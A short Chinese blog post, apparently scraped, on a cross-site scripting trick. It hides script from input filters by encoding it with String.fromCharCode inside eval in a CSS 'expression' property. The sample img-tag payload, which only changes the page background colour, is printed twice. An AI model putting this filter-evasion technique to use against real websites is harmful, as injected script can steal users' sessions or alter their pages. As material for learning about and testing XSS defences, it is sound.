expression&eval跨站的一个方法
时间:2021-12-10 15:59:06|栏目:|点击: 次
expression这个CSS的属性很多程序都没有过滤好,很容易被跨,不知道用就参考剑心的幻影论坛跨站脚本漏洞测试过程.
我这里要说的是另外一种方法,使用String.fromCharCode方法把ASCⅡ码转换为字符再用EVAL函数执行.
<img src="#" style="Xss:expression(eval(
String.fromCharCode(100,111,99,117,109,101,110,116,46,98,103,67,111,108,111,114,61,34,98,108,117,101,34)));">
嘿嘿,大把的XSS等你去挖掘,ENJOY IT :)
我这里要说的是另外一种方法,使用String.fromCharCode方法把ASCⅡ码转换为字符再用EVAL函数执行.
<img src="#" style="Xss:expression(eval(
String.fromCharCode(100,111,99,117,109,101,110,116,46,98,103,67,111,108,111,114,61,34,98,108,117,101,34)));">
嘿嘿,大把的XSS等你去挖掘,ENJOY IT :)
上一篇:去除DRM保护的好东西 FairUse4WM V1.3 绿色汉化版 下载
栏 目:
下一篇:docker 容器上编译 go 程序提示找不到文件问题
本文地址:http://www.codeinn.net/misctech/186399.html
